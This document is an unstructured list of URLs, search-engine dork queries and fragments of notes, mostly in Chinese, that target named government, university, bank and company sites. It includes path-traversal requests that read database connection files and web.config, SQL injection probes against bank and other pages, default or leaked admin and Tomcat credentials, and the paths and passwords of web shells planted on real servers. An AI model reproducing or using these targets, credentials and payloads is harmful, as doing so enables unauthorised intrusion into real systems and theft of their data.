http://ikuaishou.51tv.com:80/user/user_login.jsp www.ikuaishou.com inurl:order.php?telphone= http://adm.anjuke.com/login.action http://optools.anjuke.com/admincp.php http://baoxiao.miaozhen.com/ http://baoxiao.miaozhen.com/WebServices/WebServiceSSOUser.asmx/GetUserList http://baoxiao.miaozhen.com/WebServices/WebServiceSSOUser.asmx?op=AddUser http://www.hhws.gov.cn是个洪湖市卫生和计划生育局 http://http://www.hhws.gov.cn/admin/login.jsp http://my.hb.189.cn/index.php?app=group_check&id=30 http://my.hb.189.cn/index.php?app=group_check&id=30 http://my.hb.189.cn/index.php?app=group_check&id=30 http://miaosha.shenzhenair.com/module/hyfw/inc_flightsegment.jsp http://www.hljhospital.net是黑龙江医院的,我看了注册信息是事业单位后台url:http://www.hljhospital.net/admin/login_admin.aspx http://www.wuhaifda.gov.cn/general/download.aspx?path=/web.config http://mall.cqcbank.com/ics-mallweb/MemberLogin.do?_locale=zh_CN&BankId=999999999999&LoginType=C http://gonggao.uibe.edu.cn http://gonggao.uibe.edu.cn/admin/,使用2#中得到的用户名密码登陆 http://oa.wuhansourcing.gov.cn http://oa.wuhansourcing.gov.cn:8188/admin/ http://oa.zjcof.com.cn//defaultroot/customize/UpFile.jsp http://221.7.246.44:7001//defaultroot/customize/UpFile.jsp http://oa.shenmojiaoyu.com:7001//defaultroot/customize/UpFile.jsp http://61.191.25.190:8080/osm2/adminInfo_login.action http://61.191.25.190/publicWL/member/main.htm http://moneypay.live.189.cn/ EV8Q0:16246:0:99999:7 SRrzBo1:16246:0:99999:7 http://www.guobin.net,开始还以为不是爱康国宾的站点,后来看一些标题信息觉得应该是国宾的分站: http://www.guobin.net/data/ http://bbs.lecai.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://zoo.baidu.com/video.html?id=10 http://dev.benbun.com/web/zoo2/zoo2api.php?callback=jQuery11110088873148465349_1415455233719&fun=get_all&vid=10&_=1415455233720 http://dev.benbun.com site:qunar.com 2.plus/recommend.php http://ieer.uibe.edu.cn/test78.php http://203.93.109.56/cqjtzhywxt/ http://203.93.109.56/console http://dy.lashou-inc.com/ http://www.cd-sr.com/install/ http://www.jiangningjx.com/install/ 
http://www.reachgroup.cn/install/ http://www.cnbestluck.com/install/ http://henwei.wm10.mingtengnet.com/install/ http://www.scwlrd.com/install http://thfw.wm10.mingtengnet.com/install/ http://www.hscatv.com/install/ http://www.mycsw.org/install/ http://61.185.224.55/console http://58.18.213.238/jwgl/public/download.asp?filename=../jwjs/conn/connstring.asp http://jiaowu.hustwenhua.net/public/download.asp?filename=../jwjs/conn/connstring.asp http://219.148.49.53/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://e.tjmvti.cn/public/download.asp?filename=../jwjs/conn/connstring.asp http://221.2.229.222/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://bbs.hbpa.edu.cn/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://203.90.137.110/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://121.28.180.234/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://jiaowu.hncz.edu.cn/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://218.204.113.170/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://114.255.66.248/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://221.232.159.24/dhjw/public/download.asp?filename=../jwjs/conn/connstring.asp http://jw.mdjnu.cn/public/download.asp?filename=../jwjs/conn/connstring.asp http://221.238.158.84/jw/public/download.asp?filename=../jwjs/conn/connstring.asp http://219.217.72.30/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://210.44.80.14/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://221.212.251.229/jiaowu2008/public/download.asp?filename=../jwjs/conn/connstring.asp http://jwxt.hnebp.edu.cn/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://61.183.19.35/public/download.asp?filename=../jwjs/conn/connstring.asp http://113.135.195.58/jiaowu_ylxy/public/download.asp?filename=../jwjs/conn/connstring.asp 
http://59.173.249.245/wljiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://202.194.86.187/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://jw.hljys.cn/public/download.asp?filename=../jwjs/conn/connstring.asp http://jiaowu.jljcxy.com/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://music.nchu.edu.cn/Uploadfiles/1.asp http://redmine.lashou-inc.com/ http://www.zkcz.gov.cn/userSites/zksczj/document.jsp?siteid=402881ce2da1ff8c012da2058fe90005 http://112.95.238.211:8080用户名:admin密码:123456就进去进去了 http://124.115.221.71/ http://guang.baidu.com/g/getinst?intPage=0&instid=5%27%20order%20by%201%20limit%200,1%23 http://gl.triolion.com/ http://oaf.yitoa.com:6688/ http://gl.triolion.com/wui/main.jsp?templateId=1 http://xxxxxx/background/festivalremind.php?ID=1 www.keepc.com/getRatesList.act https://ds3.research.microsoft.com http://211.151.175.48/loginact.php http://211.151.175.48/left.php http://211.151.175.48/usermanage/admin_adduser.php?id=2 http://www.fjsw.gov.cn/news.aspx?lmid=5 http://www.fjsw.gov.cn/topic/zxhl/index.aspx?ztid=5 http://log.zhenguanyu.com/gelf http://115.236.23.17:8080用户名:admin密码admin http://115.236.23.17:8080/jsp.jsp密码是:528998 http://www.gxgxw.gov.cn/CommunicateOnNet/Suggestions/SuggestionAdd.aspx?topicId=3 url:http://58.49.94.100:8000/manager/html user:tomcat pass:tomcat http://58.49.94.100:8000/HdIntegration/ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://www.ky-express.com/Jifen/articles.aspx?article=jifenjieshao http://www.ky-express.com/Chanpin/Default.aspx?article=dangtianda http://www.ky-express.com/News/ShowNews.aspx?article=800 http://www.ky-express.com/Jifen/GiftFenlei.aspx?class=8 www.8884321.com http://yun.myoa123.com/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3 http://yun.myoa123.com/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=50 http://122.13.2.24:8080/login.asp 
http://old.ncu.edu.cn/cgi-bin/ncu/manage.pl?job=3&searchword=end&word=%D0%C2%CE%C5%D6%D0%D0%C4&username=master&password=newncuxb442433&key=news http://my.4399.com/game/list http://www.yihengkx.com/prosec.jsp?keyword=* http://www.shbo-xun.com/prosec.jsp?keyword=* http://jingkeleici.com/prosec.jsp?keyword=* http://www.aohaosiyq.com/prosec.jsp?keyword=* http://www.jinghongyq.com/prosec.jsp?keyword=* http://xsc.cuit.edu.cn/WebSite/Web/SearchList-Title~2014.html url:http://59.175.176.236:8000/manager/html user:tomcat pass:tomcat http://59.175.176.236:8000/super/ http://www.bztax.gov.cn/viewnews.aspx?id=470 http://www.bztax.gov.cn/article.aspx?classID=03 http://www.bztax.gov.cn/admin/ http://www.bztax.gov.cn/admin/index.asp http://imsfa.org/NewsContent.aspx?id=16 http://113.106.92.19/loginAccount.action http://www.haitiansoft.com:8080/ http://info.3g.qq.com/g/s?g_f=18449&g_ut=1&aid=gamezone_ss&id=gamezone_20120327000131 http://info.3g.qq.com/g/s?g_f=18449&g_ut=1&aid=gamezone_ss&id=gamezone_20140911012476 http://xw.qq.com/c/games/20140911012476 http://games.qq.com/a/20120327/000131.htm?pc http://act3.cq.qq.com/7162/work/show-id-109.html http://**.**.**/sgatconsult/login.jsp http://gzcx.tynu.edu.cn/KfWeb/admin/UserManager.aspx http://cwch.ahu.edu.cn/querynetweb/admin/UserManager.aspx http://www.cqvie.com/xfcxsq/admin/UserManager.aspx http://59.72.128.44/KfWeb/admin/UserManager.aspx http://cycwc.gzife.edu.cn/kefa//admin/UserManager.aspx http://www.shcdkf.com/kfweb/admin/UserManager.aspx http://home.gmw.cn/index.php http://cj.wyn88.com/ http://km.wyn88.com/ http://km.wyn88.com:9001/ http://km.wyn88.com:9001/spy.php password:angel http://218.2.102.178:8000/manager/html user:admin pass:admin http://218.77.183.130/platform/base/ul_ls.action http://demo.xdcms.cn/ http://food.nwsuaf.edu.cn/2013/clu.php?clu_id=3 http://www.hebeiroad.com/ http://xianguo.com/login http://www.zhihu.com/question/24715677 http://www.zhihu.com/question/23391000: http://tieba.baidu.com/p/2784747639 
http://tieba.baidu.com/p/3375565083 http://tieba.baidu.com/p/2355041684: http://www.12306.cn/mormhweb/ggxxfw/wbyyzj/201106/srca12306.zip http://www.12306.cn/mormhweb/kyfw/question/201204/t20120427_701.html https://bidding.nottingham.edu.cn/upload5warn/css.jsp http://oa.travelzen.com/Users/Membership/LogOn http://61.156.3.138:8080/Unicom112/index.jsp http://61.156.3.138:8080/Unicom112/web.action;jsessionid=5EC6895CE331F3683CF9E76F62481088 http://career.huawei.com/recruitment/services/portal/portaluser/findFormData?formName=Portal_China_R_S_F&value={%22sf0951001407090%22:%22500001%22 http://www.jinanyiyuan.com/view.asp?id=1665 http://down.chinaz.com/soft/34989.htm https://ulb.ucloud.cn/api/ulb/createPort www.swjtu.edu.cn www.sicnu.edu.cn www.swust.edu.cn www.scu.edu.cn www.njtc.edu.cn www.sctu.edu.cn www.xcc.edu.cn www.scetc.edu.cn inurl:smalllist.asp?smallclassid= http://www.hblxcy.cn/smalllist.asp?smallclassid=185 http://lib.sdpt.com.cn:82/skzx/Smalllist.asp?SmallClassID=24 http://www.ylgtzy.gov.cn/smalllist.asp?smallclassid=220 http://www.hblxls.com/smalllist.asp?smallclassid=303 http://www.law900.com/smalllist.asp?smallclassid=142 http://ln.5210.cn/smalllist.asp?smallclassid=253 http://tz.10.gov.cn/smalllist.asp?smallclassid=285 http://www.tfxk.com http://www.lq22x.com/DangDetail.aspx?id=1901 http://www.lqycsxx.com/DangDetail.aspx?id=1821&pid=68 http://www.lq21xx.com/Teachers.aspx?pid=132 http://www.lq25x.com/News.aspx?pid=8 http://www.cdfrg.com/News.aspx?pid=147 http://www.*****.com/Administrator/admin_login.aspx http://www.*****.com/administrator/admin/add.aspx http://www.*****.com/administrator/administrator/admin/admin.aspx http://**.**.** http://et.airchina.com.cn/caapp/checkUserAction.action?lang=null&method=refund&rescode=【订单号】&time=1415585664068&hash=bca4cdfc485359515817bcbacd336979fc72dc76192639e3f018dc9f400c2209 http://nmcqjy.com/newsfb/sylist.asp?tbid=9764 http://press.fmmu.edu.cn/AdvanceQry.aspx?pid=190 
http://kuaidadi.com/index/company.html?keywords=aaa http://weibo.cn/interface/***/***.php?ck=1&c=iphone&gsid=***&since_id=1;cat http://www.qibosoft.com//do/class.php?key=90sec http://117.184.99.117/masLoginLogicAction/login.action http://my.1ting.com/login http://my.1ting.com https://cn.teslamotors.com/cn/complete-basic-form http://www.actionsoft.com.cn/news/news.jsp?id=0076104161ed27483ba25f3f38488904&flag=mtbd http://wooyun.org/bugs/wooyun-2014-071907 http://discover.ie.sogou.com/status?h=&cmd=user_history&v=1 http://demo.dtcms.net/ http://demo.dtcms.net/user/message/show-1841.html http://www.gzbg100.cn/sysadmin/Login.aspx http://www.gzbg100.cn/sysadmin/Login.aspx http://www.517na.com http://www.stuh.com.cn/section.asp?page=1&sec_autoid=95 http://www.sycz.gov.cn/Arcticle_list.jsp?No_id=07 url:http://121.35.253.157:81/manager/html user:admin http://data.2366.com http://data.2366.com/addtion/getcalan_newk.php?op=searchRecommend&findTime=%2527 http://data.2366.com/addtion/getcalan_newk.php?op=searchRecommend&findTime=1 http://club.xywy.com/ www.188sc.cn/MoreList.aspx?Type=2 http://shop.qidian.com/ajax/StoreHandler.ashx?Method=loadstoreitem&pageindex=1&r=0.7435916543472558&sorttype=0&cate=-1&keyword=aaa http://www.xiaheng.net/ site:tt-art.com inurl:order site:gd.sina.com.cn http://www.esensoft.com.cn/ intitle:i@Report通用WEB网络报表平台 http://bug.focus.cn/login_page.php http://bug.focus.cn/my_view_page.php http://bug.focus.cn/bug_report_page.php http://lab.vogel.com.cn/ http://hyd.trade.qunar.com/ http://htj.trade.qunar.com/ http://www.cugb.edu.cn:80/research/kmoreInfo.action?smallClassID=12345&bigClassID=12345 http://www.cugb.edu.cn:80/profSearch.action?profname=88888 http://www.cugb.edu.cn:80/profhomeList.action?condition=88888 http://**.**.**/jspxxmgl/index.phpg=Home&m=Index&a=notice&id=30 http://**.**.**/tpd/ http://oa.998.com/login/Login.jsp http://www.sinorail.com/JobLists.aspx?ar= http://www.sinorail.com/admin inurl:xpCatalog_xpDesc.asp?action_key_order= 
inurl:shopxp_news.asp http://www.woaipf.com/ http://www.zao22.com/ http://www.gzwine.com.cn/ http://www.yndnjy.com/ http://www.zggzf.com/ http://www.outlanderex.com/ http://www.lecaimall.com/ http://61.141.236.9/ http://61.141.236.9/memadmin-1.0.12/memadmin/index.php?action=set.con http://61.141.236.9/redisadmin50/?import&s=0 http://61.141.236.9/phpMyAdmin/index.php?token=38ac6a0c4ad6e2c4ca6c76ad5e600669 https://accounts.ctrip.com/globalwap/account/login/ http://wenwen.sogou.com/z/q62913650.htm http://wooyun.org/bugs/wooyun-2010-053212 http://www.osrqd.com/HQWCMS/login_login.action http://www.osrqd.com/HQWCMS/login_login.action http://download.coolyun.com/NetWidget/app/app/tools/20140421093117/php.php inurl:mafen.asp?shuxing= http://221.181.233.195:10003/pl_add.asp?id=2009893541439.pdf http://218.92.71.5:1085/trebook/pl_add.asp?id=2009893541439.pdf http://www.zwxx.org/tushu/pl_add.asp?id=2009893541439.pdf http://220.170.135.156:88/dzts/pl_add.asp?id=2009893541439.pdf http://220.169.108.17:81/dzbook/pl_add.asp?id=2009893541439.pdf http://www.hssqjy.com/dzts/pl_add.asp?id=2009893541439.pdf http://www.zcool.com.cn/ https://github.com/ChadwickSun/devplatform/blob/2a805ffbf6f240d10a9a1a2efe858b0b0545a8ce/src/main/conf/.svn/text-base/mailConfig.properties.svn-base https://github.com/123389141/baibaiba/blob/3712d565337827159bf3d78718cca0b24e8d87d4/config.php http://59.173.7.146:7001/ebizweb/loginAction!onloadLogin.action http://59.173.7.146:7001/ebizweb/test1.jsp http://59.173.7.146:7001/ebizweb/jspspy2010.jsp http://gefco.cae.com.cn:443/Main.aspx https://github.com/huangmingqh/IES/blob/8ef1080ae9b9f54a978965ef50243bc07b60ae72/ies-project/ies-infrastructure/src/main/java/com/eshore/ies/infrastructure/common/EmailUtil.java http://114.215.124.129/get_news_content.php?id=123脚本没有加参数过滤,导致sql注入产生 https://e.boc.cn//ehome/SQISOFT/web/webNew/nSellorActivityDetail.aspx?SaID=SA0000000005%27%20AND%203*2*1%3d6%20AND%20%27000mX4u%27%3d%27000mX4u 
https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguan_news_detail.aspx?newsId=PN0000000017%27%20AND%203*2*1%3d6%20AND%20%27000VSRz%27%3d%27000VSRz http://219.143.**.**/ https://e.boc.cn//ehome/SQISOFT/web/webNew/nWuguan_service_detail.aspx?wuguanServeId=PT0000000019%27%20AND%203*2*1%3d6%20AND%20%27000PBig%27%3d%27000PBig http://xxxxxx/background/smsstatusreport.php?ID=1 inurl:mafen.asp?shuxing= http://61.175.231.112:8090/dzts/gl_tz_xian.asp?id=1547 http://221.181.233.195:10003/gl_tz_xian.asp?id=23 http://218.92.71.5:1085/trebook/gl_tz_xian.asp?id=23 http://www.zwxx.org/tushu/gl_tz_xian.asp?id=23 http://220.170.135.156:88/dzts/gl_tz_xian.asp?id=23 http://220.169.108.17:81/dzbook/gl_tz_xian.asp?id=23 http://www.hssqjy.com/dzts/gl_tz_xian.asp?id=23 https://e.boc.cn/ehome/SQISOFT/web/webNew/nProductDetail.aspx?ProID=260返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nProductDetail.aspx?ProID=260'and'1'='1返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nProductDetail.aspx?ProID=260'and'1'='2返回错误 http://e.boc.cn/ehome/SQISOFT/web/webNew/nCommunityIndex.aspx?CommID=EC0000000231返回正常 http://e.boc.cn/ehome/SQISOFT/web/webNew/nCommunityIndex.aspx?CommID=EC0000000231'and'1'='1返回正常 http://e.boc.cn/ehome/SQISOFT/web/webNew/nCommunityIndex.aspx?CommID=EC0000000231'and'1'='2返回错误 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000080返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000080'and'1'='1返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000080'and https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000058返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000058'and'1'='1返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000058'and'1'='2返回错误 https://e.boc.cn/ehome/service/shop/getShopListForPaging.json?code=88&codeType=province&page=0&pagesize=6&sort=%27PC1001%27&t=1415697252399 
https://e.boc.cn/ehome/service/shop/getShopListForPaging.json?code=88%27%20and%20%271%27=%271&codeType=province&page=0&pagesize=6&sort=%27PC1001%27&t=1415697252399 https://e.boc.cn/ehome/service/shop/getShopListForPaging.json?code=88%27%20and%20%271%27=%272&codeType=province&page=0&pagesize=6&sort=%27PC1001%27&t=1415697252399 http://www.bankofbbg.com/portal/index.htm http://**.**.**/portal/rc/zxzp/A091902index_1.htm http://**.**.**/cms/hireonline/viewpic.jsp www.bankofbbg.com//portal/hrpic/1403598551582964.jsp http://www.dqyzj.com/shownew.aspx?id=135 inurl:mafen.asp?shuxing= http://221.181.233.195:10003/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 http://218.92.71.5:1085/trebook/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 http://www.zwxx.org/tushu/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 http://220.170.135.156:88/dzts/ping_hao.asp?fenlei=&mingcheng=357950 http://220.169.108.17:81/dzbook/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 http://www.hssqjy.com/dzts/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 https://github.com/123389141/baibaiba/blob/3712d565337827159bf3d78718cca0b24e8d87d4/config.php https://github.com/123389141/baibaiba/blob/3712d565337827159bf3d78718cca0b24e8d87d4/home.php http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://www.fhredcross.org.cn/Donations.aspx?ParentCode=0004&NodeCode=00040001 http://mba.fjnu.edu.cn/sxw/View.aspx?id=67注入点在这 https://60.216.5.94/ http://www.haitiansoft.com:8080/ http://**.**.** http://**.**.** http://**.**.**/vos http://**.**.**/oa http://**.**.** http://180.169.46.89/main.php http://www.aino.hk http://218.22.33.234:8050/,HealthReport对应体检报告、Upload对应体检用户信息 http://zsb.hunnu.edu.cn/UploadFiles/20141110225949614.asp http://116.228.55.189:8887/secs/loginAction.do?action=login http://cwch.ahu.edu.cn/querynetweb/admin/admin_loginInfo.aspx http://www.cqvie.com/xfcxsq/admin/admin_loginInfo.aspx 
http://59.72.128.44/KfWeb/admin/admin_loginInfo.aspx http://cycwc.gzife.edu.cn/kefa//admin/admin_loginInfo.aspx http://gzcx.tynu.edu.cn/KfWeb/admin/admin_loginInfo.aspx http://www.shcdkf.com/kfweb//admin/admin_loginInfo.aspx http://www.sptdch.cn:8080/happy/reportsearch.asp http://www.wowsai.com/dynamic http://ea.ehuatai.com/ http://ea.ehuatai.com/invoker/JMXInvokerServlet http://jf.ztgame.com/do_buy.php http://shop.ehuatai.com/isale/risk/casualtyInsuranceAction-initToInformation.action http://www.taojiang.gov.cn/jcms/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://www.taojiang.gov.cn/jcms/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://xxgk.lucheng.gov.cn/xxgk/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://xxgk.lucheng.gov.cn/xxgk/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://sha.sinotrans.com/jsearch/objectbox/selectx_grouplist.jsp?groupid=jsearch&changetype=1 http://sha.sinotrans.com/jsearch/objectbox/selectx_grouplist.jsp?groupid=jsearch&changetype=1 http://www.wugang.gov.cn/jis/objectbox/selx_grouplist.jsp?groupid=1&changetype=1 http://www.wugang.gov.cn/jis/objectbox/selx_grouplist.jsp?groupid=1&changetype=1 http://www.taojiang.gov.cn/jcms/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://sha.sinotrans.com/jsearch/objectbox/selectx_grouplist.jsp?groupid=jsearch&changetype=1 http://xxgk.lucheng.gov.cn/xxgk/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://www.wugang.gov.cn/jis/objectbox/selx_grouplist.jsp?groupid=1&changetype=1 http://www.taojiang.gov.cn/jcms/workflow/objectbox/selectx_grouplist.jsp?groupid=1&changetype=1 http://sha.sinotrans.com/jsearch/objectbox/selectx_groupuserlist.jsp?groupid=jsearch&changetype=1 http://xxgk.lucheng.gov.cn/xxgk/workflow/objectbox/selectx_grouplist.jsp?groupid=1&changetype=1 http://www.wugang.gov.cn/jis/objectbox/selx_grouplist.jsp?groupid=1&changetype=1 
http://t9.go2oa.com/t9/core/frame/webos/index.jsp http://t9.go2oa.com/t9/t9/core/funcs/message/weixun_share/act/T9WeiXunShareAct/getWeiXunById.act http://218.242.43.114 http://218.242.43.30 http://210.32.33.160/idl/ZTClassNav.aspx?majorcode=r http://219.223.211.23//ZTClassNav.aspx?majorcode=r http://xwlw.zju.edu.cn/idl/ZTClassNav.aspx?majorcode=r http://219.244.185.22/idl//ZTClassNav.aspx?majorcode=r http://papers.libmill.com/ZTClassNav.aspx?majorcode=r http://202.204.190.31//ZTClassNav.aspx?majorcode=r http://202.115.72.1/idl/ZTClassNav.aspx?majorcode=r http://202.197.107.11:86/idl30//ZTClassNav.aspx?majorcode=r http://qhbfm.jiehr.com.cn//ZTClassNav.aspx?majorcode=r http://sjzcxqur.jiehr.com.cn/ZTClassNav.aspx?majorcode=r http://210.27.181.210//ZTClassNav.aspx?majorcode=r http://202.194.153.155/idl//ZTClassNav.aspx?majorcode=r http://59.73.126.135/idl/ZTClassNav.aspx?majorcode=r http://papers.libmill.com/ZTClassNav.aspx?majorcode=r http://papers.libmill.com/ZTClassNav.aspx?majorcode=r http://qhbfm.jiehr.com.cn//ZTClassNav.aspx?majorcode= http://210.27.181.210//ZTClassNav.aspx?majorcode=r http://202.194.153.155/idl//ZTClassNav.aspx?majorcode inurl:getlist.asp?pmid= http://www.jxgcxy.tzc.edu.cn/sy/acritever.asp?pmid=132&fmid=154&id=156 http://5sing.kugou.com/my/message/note(站内短信) http://58.56.128.4:88/tiss2/ http://123.234.41.10:88/TISS/login.aspx www.cqbdyg.com,如图: http://tg.tttuangou.net http://film.spider.com.cn/cinema-44003301/?filmId=201411366068&showDate=2014-11-08&#p=1 http://202.100.22.236/usermanager.asp https://github.com/dly1986/brother/blob/master/protected/config/console.php http://brother.toursforfun.com http://60.247.104.99/ http://service.ehuatai.com/ http://app.junph.com/Shopping/OrderDetail.aspx?OrderCode=2014111103452 site:189.cn inurl:order http://shop.zcool.com.cn http://www.crecgi.com/?resultsshow/tp/235/id/14*.html http://www.lorealprofessionnel.com.cn/product/product.aspx?sort=3&pr_id=2 
http://list.taobao.com/itemlist/default.htm?json=on&atype=b&cat=50026909 https://wen.lu/?#q=site:taobao.com+%22status%22:+%7B+%22code%22:+%22200%22+,+%22url%22:+%22%22+%7D http://store.taobao.com/shop/view_shop.htm?user_number_id=144161231&ssid=r11 http://jianghu.taobao.com/u/MTQ0MTYxMjMx/front.htm http://my.taobao.com/UvFQ0vFxYvCvY, http://rate.taobao.com/user-rate-UvFQ0vFxYvCvY.htm http://its.chinatax.gov.cn/common/FCKeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/&NewFolderName=qing http://its.chinatax.gov.cn/UploadFiles/File/xm1.jsp http://its.chinatax.gov.cn/xml/list_notice.jsp http://210.32.33.160/idl/LookPostilstr.aspx?stuid=0 https://www.sjz12333.gov.cn/ user:superman pass:talent http://bbs.os.baidu.com/forum.php http://bbs.os.baidu.com/uc_server/ http://www.qlsafety.gov.cn/gwcs/qtdisp.asp?disp_id=1104 http://www.qlsafety.gov.cn/gwcs/in_file.asp?file_name=1.asp http://gx.10086.cn:80/dudao/validateAction.action http://www.ztyb.com/ztsi/index.jsp http://exchange.ztyb.com:8080/ztyb/index.htm http://support.woniu.com/ http://**.**.**/ http://**.**.**/ http://jhtj.crcc.cn/ www.51offer.com http://tongji.baidu.com/ http://yhds.dianxinos.com/confadmin/system/action.php?sAction=login_cookie&bLogin=true http://developer.baidu.com/ http://www.tijiangz.com/news.php?sortid=118 https://ssl.wahaha.com.cn http://222.172.223.248/login http://www.scddj.com/AboutUs.aspx?type=10 http://www.esairport.cn/ http://www.esairport.cn/admin/index.php,使用2#中得到的用户名密码登陆 http://www.esairport.cn/test77.php http://www.sgrd.gov.cn/website/portal/portalSiteAction.action http://www.bp.gov.cn/zizhan/index.php?cid=211,这里是个注入点 http://www.bp.gov.cn/zizhan/index.php?cid=211 http://www.bp.gov.cn/bpxt/feedback.php?type=2 http://www.bp.gov.cn/bpxt/feedback.php?type=2,再访问注入URL,我也不知道为什么 http://222.172.223.62/sqoa/default.aspx http://222.172.223.62/sqoa/OtherDoc/20141113091653cc37f8.aspx 
http://222.172.223.62/sqoa/OtherDoc/20141112184118152d2b.aspx cn:8080 http://hb.passport.189.cn:8080/AccountInfoQuery soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://hb.passport.189.cn:8080/ soap:Body soap:Envelope http://www.nj-hisense.com/company/zm/5/serch.asp?keywd=a&ft=news&userid=njhisense https://uhost.ucloud.cn/probe Cookie:NULL http://ip/`&probe_frequency=1&retry=+3&group_id%5B10844%5D=on&probe_type=1&use_session=yes&format=json®ion_id=5001&zone_id=1 http://www.tzzy.gov.cn/ https://222.38.1.47/Alarm/Public/Inc/这个里面找到数据库的密码,并且尝试了一下外网IP链接数据库,竟然链接成功 http://202.100.228.50/datagateway/index.action http://www.zjjs.net/detail.asp?id=159179 www.zjjs.net/detail.asp?id=159179 www.zjjs.net/detail.asp?id=159179 http://www.zjjs.net/admin/admin_login.asp?action=login hr.crcc.cn/admin http://www.90576.com/ http://demo.thinksns.com/t3/weiba http://bbs.amap.com/portal.php id.amap.com/interface/login inurl:aspx?tag inurl:NewListTag.aspx?tag http://www.ruczy.com/NewListTag.aspx?tag=%E5%B0%B1%E4%B8%9A http://www.xlxjy.com/NewListTag.aspx?tag=%E8%AF%81%E4%B9%A6 http://www.casshr.com/NewListTag.aspx?tag=%E5%B0%B1%E4%B8%9A http://www.rucsard.cn/Admin/Login/Login.aspx http://m.china-pub.com/and/zt_mb/zt_huodong_sj_1_more.asp?id=3742 http://m.china-pub.com/touch/zt_mb/zt_huodong_sj_1_more.asp?id=3741 http://bbs.chinaz.com/apple/add.txt http://q.51offer.com/q/98454.html http://www.changedu.com/ http://erp.suning.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://wooyun.org/bugs/wooyun-2010-064567 http://203.195.195.247:9200/_plugin/head/ http://bbs1.iheima.com/ http://bbs1.iheima.com/uc_server/.svn/entries http://bbs1.iheima.com/uc_server/data/.svn/text-base/config.inc.php.svn-base http://bbs1.iheima.com/admin.php http://101.227.8.89/ 
http://101.227.8.89/user/list.do?name=&sEcho=5&iColumns=5&sColumns=&iDisplayStart=0&iDisplayLength=10&pageSize=1000¤tPage=1&mDataProp_0=id&mDataProp_1=name&mDataProp_2=loginName&mDataProp_3=lastLoginIp&mDataProp_4=lastLoginTime&_=1415855616795 http://101.227.8.89/.svn/entries http://www.metadata.com.cn/ http://zxks.gxeea.cn:8080/gxzkweb/Page/zyxxGetQueryResult.jsp?zhuanye=B020282 http://www.skysrt.com/ http://222.172.223.73/vip/userlogin http://222.172.223.73/vip/userlogin http://pa.jsict.com/globeyes/admin/index.jsp http://pa.jsict.com/globeyes/user/index.jsp http://pa.jsict.com/globeyes/admin/login.jsp?LoginName=1111&Password=1111&user_pw2=7156&rand=7186&platform=nanjing&login=suzhou http://www.jikexueyuan.com https://passport.jd.com http://jwxt.tzpc.edu.cn/kbcx_reg.asp http://jwgl.jhu.cn/kbcx_reg.asp http://222.187.199.60/kbcx_reg.asp http://221.226.83.60:8081/kbcx_reg.asp http://jwxt.nnutc.edu.cn/kbcx_reg.asp http://jwc.jljtxy.com.cn/kbcx_reg.asp http://jwcx.czie.net/kbcx_reg.asp http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/ http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0 www.hslib.gov.cn http://mall.51offer.com/order/my.html http://mall.51offer.com/order/info.html?orderCode=12014480081113 https://**.**.**/console/network/viewnetworkid=98183 